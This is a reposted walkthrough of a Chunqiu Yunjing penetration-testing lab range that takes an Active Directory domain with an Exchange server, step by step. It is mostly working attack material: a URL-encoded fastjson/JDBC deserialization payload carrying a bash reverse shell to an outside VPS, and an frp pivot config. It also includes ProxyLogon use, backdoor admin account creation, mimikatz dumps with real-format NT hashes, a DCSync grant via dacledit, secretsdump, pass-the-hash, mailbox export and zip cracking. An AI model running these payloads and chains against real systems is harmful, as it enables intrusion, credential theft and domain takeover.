[Internal Network Penetration] The most hand-holding 春秋云镜 (Chunqiu Yunjing) Exchange range walkthrough notes

Contents

flag1

flag2

flag3 

flag4


flag1

Scan the external target with fscan.

Port 8000 -> the 华夏 ERP (jshERP) web application. Reference for the code audit:

Java Code Audit: 华夏 ERP CMS v2.3 | Drunkbaby's Blog

Weak credentials: admin/123456

Exploit the fastjson deserialization in /user/list?search= through the JDBC (MySQL Connector/J) chain.

Stand up a MySQL_Fake_Server on the VPS; it hands the driver the gadget chain named in the connection's user field.

Payload (URL-encoded; 124.222.136.33:3306 is the VPS running MySQL_Fake_Server, and the embedded base64 is a bash reverse shell back to 124.222.136.33:1337):

/user/list?search=%7b%20%22%6e%61%6d%65%22%3a%20%7b%20%22%40%74%79%70%65%22%3a%20%22%6a%61%76%61%2e%6c%61%6e%67%2e%41%75%74%6f%43%6c%6f%73%65%61%62%6c%65%22%2c%20%22%40%74%79%70%65%22%3a%20%22%63%6f%6d%2e%6d%79%73%71%6c%2e%6a%64%62%63%2e%4a%44%42%43%34%43%6f%6e%6e%65%63%74%69%6f%6e%22%2c%20%22%68%6f%73%74%54%6f%43%6f%6e%6e%65%63%74%54%6f%22%3a%20%22%31%32%34%2e%32%32%32%2e%31%33%36%2e%33%33%22%2c%20%22%70%6f%72%74%54%6f%43%6f%6e%6e%65%63%74%54%6f%22%3a%20%33%33%30%36%2c%20%22%69%6e%66%6f%22%3a%20%7b%20%22%75%73%65%72%22%3a%20%22%79%73%6f%5f%43%6f%6d%6d%6f%6e%73%43%6f%6c%6c%65%63%74%69%6f%6e%73%36%5f%62%61%73%68%20%2d%63%20%7b%65%63%68%6f%2c%59%6d%46%7a%61%43%41%74%61%53%41%2b%4a%69%41%76%5a%47%56%32%4c%33%52%6a%63%43%38%78%4d%6a%51%75%4d%6a%49%79%4c%6a%45%7a%4e%69%34%7a%4d%79%38%78%4d%7a%4d%33%49%44%41%2b%4a%6a%45%3d%7d%7c%7b%62%61%73%65%36%34%2c%2d%64%7d%7c%7b%62%61%73%68%2c%2d%69%7d%22%2c%20%22%70%61%73%73%77%6f%72%64%22%3a%20%22%70%61%73%73%22%2c%20%22%73%74%61%74%65%6d%65%6e%74%49%6e%74%65%72%63%65%70%74%6f%72%73%22%3a%20%22%63%6f%6d%2e%6d%79%73%71%6c%2e%6a%64%62%63%2e%69%6e%74%65%72%63%65%70%74%6f%72%73%2e%53%65%72%76%65%72%53%74%61%74%75%73%44%69%66%66%49%6e%74%65%72%63%65%70%74%6f%72%22%2c%20%22%61%75%74%6f%44%65%73%65%72%69%61%6c%69%7a%65%22%3a%20%22%74%72%75%65%22%2c%20%22%4e%55%4d%5f%48%4f%53%54%53%22%3a%20%22%31%22%20%7d%20%7d%0a

cat /root/flag/flag01.txt

flag2

Use wget to pull fscan and frp onto the foothold, scan the intranet, and set up a tunnel.

172.22.3.12   this host (the jshERP box)
172.22.3.2    XIAORANG-WIN16   DC
172.22.3.9    XIAORANG-EXC01   Exchange
172.22.3.26   XIAORANG-PC
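As an added example (not from the original notes), the frp pair that turns the jshERP foothold into a SOCKS5 pivot for proxychains. frps runs on the VPS (124.222.136.33 is the VPS address the payload above calls back to); the port, token and SOCKS credentials are placeholders to replace. This is frp's legacy .ini syntax; frp 0.52 and later default to a TOML file with the equivalent settings.

```ini
# --- frps.ini, on the VPS (124.222.136.33 in these notes) ---
[common]
bind_port = 7000
# without a token any frpc that can reach port 7000 may register a tunnel
token = change-me-shared-secret

# --- frpc.ini, on the foothold 172.22.3.12 ---
[common]
server_addr = 124.222.136.33
server_port = 7000
token = change-me-shared-secret

[socks5]
type = tcp
# remote_port is opened on the VPS itself, so anyone who finds it gets into the range
remote_port = 1080
plugin = socks5
# placeholder credentials: leave these out and the proxy is open to the world
plugin_user = pivot
plugin_passwd = change-me-socks-password
```

Start frps on the VPS first, then frpc on the foothold, and point proxychains at the VPS side, for example `socks5 127.0.0.1 1080 pivot change-me-socks-password` in /etc/proxychains4.conf on the machine that runs the impacket tools. Every proxychains4 command in the rest of these notes goes through that line.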

Hit the Exchange server with ProxyLogon (CVE-2021-26855 SSRF chained with the CVE-2021-27065 file write) to get SYSTEM.

Create a user and RDP in to grab the flag:

net user Z3r4y 0x401@admin /add
net localgroup administrators Z3r4y /add

flag3 

The Exchange server's machine account (through Exchange Trusted Subsystem -> Exchange Windows Permissions) has WriteDACL on the domain object by default, so it can add an ACE granting DCSync to any principal it likes.

Upload mimikatz and run it as administrator:

privilege::debug
sekurlsa::logonpasswords

Summary of the useful output:

 * Username : XIAORANG-EXC01$
 * Domain   : XIAORANG
 * NTLM     : 63bb769f8b788233f66fc95d25b394cc
 * SHA1     : fab946704b39540fa89f56f53cd65e421d933fcc

 * Username : Zhangtong
 * Domain   : XIAORANG
 * NTLM     : 22c7f81993e96ac83ac2f3f1903de8b4
 * SHA1     : 4d205f752e28b0a13e7a2da2a956d46cb9d9e01e
 * DPAPI    : ed14c3c4ef895b1d11b04fb4e56bb83b
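An added helper, not part of the original notes: a small parser for sekurlsa::logonpasswords output that collects one NT hash per account, drops the wdigest/(null) entries and repeated logon sessions, and formats the `:NT` value that impacket's -hashes flag takes (the LM half left empty, as in the commands in these notes). The sample text is constructed in mimikatz's layout around the two accounts listed above; the session ids are invented.

```python
"""Parse sekurlsa::logonpasswords output into one NT hash per account."""
import re

# Constructed sample in mimikatz's layout using the two accounts above.
# Session ids are made up; the repeated Zhangtong session and the wdigest
# "(null)" entries are deliberate, real output is full of both.
SAMPLE = """
Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : XIAORANG-EXC01$
Domain            : XIAORANG
        msv :
         [00000003] Primary
         * Username   : XIAORANG-EXC01$
         * Domain     : XIAORANG
         * NTLM       : 63bb769f8b788233f66fc95d25b394cc
         * SHA1       : fab946704b39540fa89f56f53cd65e421d933fcc
        wdigest :
         * Username   : XIAORANG-EXC01$
         * Domain     : XIAORANG
         * Password   : (null)

Authentication Id : 0 ; 1234567 (00000000:0012d687)
Session           : RemoteInteractive from 2
User Name         : Zhangtong
Domain            : XIAORANG
        msv :
         [00000003] Primary
         * Username   : Zhangtong
         * Domain     : XIAORANG
         * NTLM       : 22c7f81993e96ac83ac2f3f1903de8b4
         * SHA1       : 4d205f752e28b0a13e7a2da2a956d46cb9d9e01e
         * DPAPI      : ed14c3c4ef895b1d11b04fb4e56bb83b

Authentication Id : 0 ; 1234568 (00000000:0012d688)
Session           : Interactive from 1
User Name         : Zhangtong
Domain            : XIAORANG
        msv :
         [00000003] Primary
         * Username   : Zhangtong
         * Domain     : XIAORANG
         * NTLM       : 22c7f81993e96ac83ac2f3f1903de8b4
         * SHA1       : 4d205f752e28b0a13e7a2da2a956d46cb9d9e01e
"""

# "* Field : value" lines inside the msv / wdigest / kerberos blocks
_FIELD = re.compile(r"^\s*\*\s*(Username|Domain|NTLM|SHA1|DPAPI|Password)\s*:\s*(.*?)\s*$")
_HEX32 = re.compile(r"[0-9a-fA-F]{32}")


def parse_logonpasswords(text: str) -> list:
    """Split the output into records, one per '* Username' line."""
    records, current = [], None
    for line in text.splitlines():
        match = _FIELD.match(line)
        if not match:
            continue
        field, value = match.group(1).lower(), match.group(2)
        if field == "username":
            current = {"username": value}
            records.append(current)
        elif current is not None:
            current[field] = value
    return records


def usable_hashes(text: str) -> dict:
    """One record per DOMAIN\\user (lower-cased) that carries a real NT hash.

    Records without an NTLM field (wdigest, kerberos) or with '(null)' are
    dropped; later logon sessions of the same account collapse into the first.
    """
    found = {}
    for record in parse_logonpasswords(text):
        if not _HEX32.fullmatch(record.get("ntlm", "")):
            continue
        key = f"{record.get('domain', '')}\\{record['username']}".lower()
        found.setdefault(key, record)
    return found


def impacket_hashes_arg(ntlm: str) -> str:
    """impacket takes LM:NT; leaving the LM half empty gives ':<NT>'."""
    return f":{ntlm}"


if __name__ == "__main__":
    for account, record in usable_hashes(SAMPLE).items():
        print(f"{account:32} -hashes {impacket_hashes_arg(record['ntlm'])}")
```

Machine accounts keep their trailing `$`, which is why the dacledit command below escapes it as `XIAORANG-EXC01\$` for the shell.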

proxychains4 python3 dacledit.py xiaorang.lab/XIAORANG-EXC01\$ -hashes :63bb769f8b788233f66fc95d25b394cc -action write -rights DCSync -principal Zhangtong -target-dn "DC=xiaorang,DC=lab" -dc-ip 172.22.3.2

Authenticating as the Exchange machine account with the NT hash from the mimikatz output, this writes the replication extended rights that DCSync needs (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All, used for domain synchronisation and hence for password-hash extraction) for the Zhangtong account onto the domain object DC=xiaorang,DC=lab, through the domain controller at 172.22.3.2.

Use Zhangtong to dump the domain hashes (the domain admin's included) from the DC:

proxychains4 impacket-secretsdump xiaorang.lab/Zhangtong@172.22.3.2 -hashes :22c7f81993e96ac83ac2f3f1903de8b4 -just-dc-ntlm

Pass-the-hash to the DC with the dumped Administrator hash:

proxychains4 impacket-smbexec -hashes :7acbc09a6c0efd81bfa7d5a1d4238beb xiaorang.lab/Administrator@172.22.3.2 -codec gbk

(The user@host part of these two commands was mangled into "[email protected]" by the scraper's e-mail obfuscation; it is restored here from context: Zhangtong's hash against the DC, then the Administrator hash from the dump.)

flag4

proxychains4 impacket-smbclient -hashes :7acbc09a6c0efd81bfa7d5a1d4238beb xiaorang.lab/Administrator@172.22.3.26 -dc-ip 172.22.3.2

(As above, the scraper mangled the user@host; Administrator@172.22.3.26 is inferred from the hash and from the next step.)

Move laterally to 172.22.3.26 with smbclient; the Lumia user's desktop has a secret.zip.

The zip holds the flag file, but it is password-protected.

Use pthexchange to export every mail and attachment in Lumia's mailbox (the --password value is the LM:NT pair; the 32 zeros stand in for the empty LM half):

proxychains python3 pthexchange.py --target https://172.22.3.9/ --username Lumia --password '00000000000000000000000000000000:862976f8b23c13529c2fb1428e710296' --action Download

One of the mails says the archive password is a phone number.

Download the csv attachment from another mail.

Write a script to pull out the phone field:

import csv

# The phone numbers collected from the csv attachment
phone_numbers = []

# newline='' is what the csv module expects; utf-8-sig also strips the BOM an
# Excel/Outlook export may start with, which would otherwise break row['phone']
# (the file is assumed to be UTF-8, adjust the encoding if it is not)
with open('phone lists.csv', 'r', newline='', encoding='utf-8-sig') as file:
    reader = csv.DictReader(file)  # DictReader lets us pick the column by name
    for row in reader:
        phone = (row.get('phone') or '').strip()
        if phone and phone not in phone_numbers:  # skip blanks and duplicates
            phone_numbers.append(phone)

# Show what was extracted
for phone in phone_numbers:
    print(phone)

# Write the numbers out one per line as a wordlist for john
with open('extracted_phones.txt', 'w') as output_file:
    for phone in phone_numbers:
        output_file.write(phone + '\n')

Feed the wordlist to john:

zip2john secret.zip > zip.txt
john --wordlist=extracted_phones.txt zip.txt

The password comes out as 18763918468. Extract secret.zip with it and grab the flag.


Reposted from blog.csdn.net/uuzeray/article/details/141993713